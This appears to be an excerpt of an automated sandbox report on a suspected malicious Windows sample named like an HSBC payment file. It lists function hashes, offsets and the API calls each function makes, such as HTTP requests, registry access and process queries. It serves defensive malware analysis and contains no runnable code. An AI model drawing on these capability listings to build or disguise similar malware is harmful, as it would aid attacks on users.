                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                                • Opcode ID: 086eebbdaf87714a330a9aa4408e7f5fa263d6657121f78345d0f24d13b9bdc2
                                                                                                                                • Instruction ID: 82877e079fa19d3c66a87494f05b22479cf9b2aebc6ea069b213adc4eea2642b
                                                                                                                                • Opcode Fuzzy Hash: 086eebbdaf87714a330a9aa4408e7f5fa263d6657121f78345d0f24d13b9bdc2
                                                                                                                                • Instruction Fuzzy Hash: F951C1B16493009AD724AF28D84967F7BE4EF49321F044A2DF895D61E2DB78CC0687A2
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$_free
                                                                                                                                • String ID: 3cs$_s
                                                                                                                                • API String ID: 2620147621-944816363
                                                                                                                                • Opcode ID: 12f00d24251fa76a1ec51fa7898df28480c8615f21e29221eb68ab40e19edd44
                                                                                                                                • Instruction ID: 353d8154226009b2499e2dd679fdfcd58f90823960bfa041da5cfb0f038c5e39
                                                                                                                                • Opcode Fuzzy Hash: 12f00d24251fa76a1ec51fa7898df28480c8615f21e29221eb68ab40e19edd44
                                                                                                                                • Instruction Fuzzy Hash: C4515D71A043419FEB25CF28C440B6ABBF5BF85310F44492DE999C7352DB39E945CB82
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$_memmove
                                                                                                                                • String ID: 3cs$ERCP
                                                                                                                                • API String ID: 2532777613-503592135
                                                                                                                                • Opcode ID: 2181e902178b21c3e6679f6955dab7c6f9f6a91ff5ed27e3960a51425af60928
                                                                                                                                • Instruction ID: 232dc5220e54fc0b056ca28959520a566f532a55447864a2daf384d0bc8ff03a
                                                                                                                                • Opcode Fuzzy Hash: 2181e902178b21c3e6679f6955dab7c6f9f6a91ff5ed27e3960a51425af60928
                                                                                                                                • Instruction Fuzzy Hash: 40519071A00705EBEB24DF65C8457ABB7F4BF04314F20857EE54ACB282E778AA44CB80
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007827C0
                                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007827DC
                                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00782822
                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007E5890,00000000), ref: 0078286B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                                • Opcode ID: 3d6aeb782878df142c66653478d46e28dd6e7360bf73643e02a88f30c61c624a
                                                                                                                                • Instruction ID: b6d888a9eb9fd78a8329da66677b8ad6bce2a4bd3d83fb046194d17f6ac6a099
                                                                                                                                • Opcode Fuzzy Hash: 3d6aeb782878df142c66653478d46e28dd6e7360bf73643e02a88f30c61c624a
                                                                                                                                • Instruction Fuzzy Hash: E541A270644341AFDB24EF24CC48B1ABBE4EF85315F14492EF965D7292D738E906CB62
                                                                                                                                APIs
                                                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0079D7C5
                                                                                                                                  • Part of subcall function 0072784B: _memmove.LIBCMT ref: 00727899
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharLower_memmove
                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                • API String ID: 3425801089-567219261
                                                                                                                                • Opcode ID: 47c24c7c337ea242c003bf0a21570a919fb9662a1a66633ab9ec4888ee577cb7
                                                                                                                                • Instruction ID: 5c63a95dc381d3cc22f557c20042906f7a143dda015c0cf7c9530403f0c10649
                                                                                                                                • Opcode Fuzzy Hash: 47c24c7c337ea242c003bf0a21570a919fb9662a1a66633ab9ec4888ee577cb7
                                                                                                                                • Instruction Fuzzy Hash: 0E31CF71A04619EBCF14EF94D855DBEB3B4FF01320B00862AE869973D2DB39AD05CB80
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00778F14
                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00778F27
                                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00778F57
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 365058703-1403004172
                                                                                                                                • Opcode ID: 0f574cf4efa123c110e80b38a2dc924e78c1e122706e6b86e16df93bc43fd938
                                                                                                                                • Instruction ID: 346a780887f9b4a278f21451af9b5cff8264e8024772286f229566d6dea51f80
                                                                                                                                • Opcode Fuzzy Hash: 0f574cf4efa123c110e80b38a2dc924e78c1e122706e6b86e16df93bc43fd938
                                                                                                                                • Instruction Fuzzy Hash: BC21EE71A40104BEDF18ABB0DC8DDFEB769DF463A0F048129F429A62E0DB3D5809D660
                                                                                                                                APIs
                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0079184C
                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00791872
                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007918A2
                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 007918E9
                                                                                                                                  • Part of subcall function 00792483: GetLastError.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 00792498
                                                                                                                                  • Part of subcall function 00792483: SetEvent.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 007924AD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                • Opcode ID: 8761f72ba59f9d50962a8491481174caa4869e3416d62b97b945c66489f91fc6
                                                                                                                                • Instruction ID: e14ba4c1ea09331d8ab2eedd2621f842364998b4b68ae5c71474b76412e9237d
                                                                                                                                • Opcode Fuzzy Hash: 8761f72ba59f9d50962a8491481174caa4869e3416d62b97b945c66489f91fc6
                                                                                                                                • Instruction Fuzzy Hash: A821D4B5500309BFEF11AFA0EC89EBF77EDEB89754F50412AF40596140DB289D15A7A0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
                                                                                                                                  • Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
                                                                                                                                  • Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91
                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007A6461
                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 007A6468
                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007A647D
                                                                                                                                • DestroyWindow.USER32(?), ref: 007A6485
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                • String ID: SysAnimate32
                                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                                • Opcode ID: b6617208152856517fc717ab4d75cb2cb3472b012ddf9ff26c11b47d150bec80
                                                                                                                                • Instruction ID: 1db059c1183952c4df96fd3d52285e7d3aaad5ff6773f52a24267fbb39830e1c
                                                                                                                                • Opcode Fuzzy Hash: b6617208152856517fc717ab4d75cb2cb3472b012ddf9ff26c11b47d150bec80
                                                                                                                                • Instruction Fuzzy Hash: EA218EB1200245EBEF104FA4DC84EBA77A9EB9A724F188729FA1096190D779DC519760
                                                                                                                                APIs
                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00786DBC
                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00786DEF
                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00786E01
                                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00786E3B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                                • String ID: nul
                                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                                • Opcode ID: 8cb2513d1247ece21bcf63d0f87aa1b4b13e7b3d2471cb301974c808fffbe791
                                                                                                                                • Instruction ID: 51f04c3454f87ea2a49d3e5f14561e8f5759fd016e068dd8ce632b0a3ee9049b
                                                                                                                                • Opcode Fuzzy Hash: 8cb2513d1247ece21bcf63d0f87aa1b4b13e7b3d2471cb301974c808fffbe791
                                                                                                                                • Instruction Fuzzy Hash: EA218174740209BBDF20AF69DC04B9A77B4FF85720F204619FDA1D72D0D77499508B64
                                                                                                                                APIs
                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00786E89
                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00786EBB
                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00786ECC
                                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00786F06
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                                • String ID: nul
                                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                                • Opcode ID: cbe88f7e98c92256a88ad86c84cdcfe957958af0cc3e551d50dcbde1b406bccf
                                                                                                                                • Instruction ID: 84924bacadbaa45ae65743d8bb1e727f05e6e644b9969a4c407a660a527c8dc6
                                                                                                                                • Opcode Fuzzy Hash: cbe88f7e98c92256a88ad86c84cdcfe957958af0cc3e551d50dcbde1b406bccf
                                                                                                                                • Instruction Fuzzy Hash: 5C21B679540305BBDB20AF69DC04A9A77E8FF85730F204A19FDA1D72D0EB74A850CB61
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0078AC54
                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0078ACA8
                                                                                                                                • __swprintf.LIBCMT ref: 0078ACC1
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,007AF910), ref: 0078ACFF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                • String ID: %lu
                                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                                • Opcode ID: b01ce67af530e7e8a7fb2a14c15485566658448e19c7b4eafc9aa28bf6416ac2
                                                                                                                                • Instruction ID: ce3e04f3343951b9290071df086c31316a0c48cab0068016589f51313432df0d
                                                                                                                                • Opcode Fuzzy Hash: b01ce67af530e7e8a7fb2a14c15485566658448e19c7b4eafc9aa28bf6416ac2
                                                                                                                                • Instruction Fuzzy Hash: 6D217170A00109EFCB10EFA5DD49EAE7BB8FF89714B048069F909DB251DB75EA41CB61
                                                                                                                                APIs
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 0078115F
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 00781184
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 0078118E
                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 007811C1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                • String ID: @x
                                                                                                                                • API String ID: 2875609808-1688982417
                                                                                                                                • Opcode ID: 433c4dfd29e8761309e32daccf18b415519fbe00b7151ec2d7eab407cbb4e432
                                                                                                                                • Instruction ID: 6345e669b785c3c8220d1be0ed0b547ea135795d657e9b04bd4cc087dd63d5a5
                                                                                                                                • Opcode Fuzzy Hash: 433c4dfd29e8761309e32daccf18b415519fbe00b7151ec2d7eab407cbb4e432
                                                                                                                                • Instruction Fuzzy Hash: E3113C31D4051DD7CF00AFE5D848AEEBB7CFF49721F408055EA85B2240CB789562CB95
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00781B19
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                • API String ID: 3964851224-769500911
                                                                                                                                • Opcode ID: b76f31d0724228275d34295cc37f98056cdfaf95a01d26e2d97e4bc2792c18cb
                                                                                                                                • Instruction ID: 798a7520eaea2bfe643d2fe2899fb3b190954e6738b974196ab8667db61af134
                                                                                                                                • Opcode Fuzzy Hash: b76f31d0724228275d34295cc37f98056cdfaf95a01d26e2d97e4bc2792c18cb
                                                                                                                                • Instruction Fuzzy Hash: 08115EB0940118DFCF40EFA4E8558EEB7B4FF26304F5484A5D855A7291EB3A5D06CB90
                                                                                                                                APIs
                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0079EC07
                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0079EC37
                                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0079ED6A
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0079EDEB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2364364464-0
                                                                                                                                • Opcode ID: 5a8759702c7cd97abef9ad873dfb7c892abd80b72f800c06a0283bc0dd355981
                                                                                                                                • Instruction ID: 7cbdd7ad5ce8425635be059e9a6eada7491df88e4da06e16619f0e52c2acdd38
                                                                                                                                • Opcode Fuzzy Hash: 5a8759702c7cd97abef9ad873dfb7c892abd80b72f800c06a0283bc0dd355981
                                                                                                                                • Instruction Fuzzy Hash: D28184B1600710AFDB60EF28D84AF2AB7E5AF48710F08881DF999DB2D2D775AC40CB55
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1559183368-0
                                                                                                                                • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                                • Instruction ID: 3473826d269517cc9d0edf765b116fc27570bc59d42660764efe92d8feb8f0f0
                                                                                                                                • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                                • Instruction Fuzzy Hash: 2C51E970A00B05DBCB249FA9D84457EB7B3AF41331F248729F8359A2D2D7789D608F41
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A00FD
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A013C
                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007A0183
                                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 007A01AF
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 007A01BC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
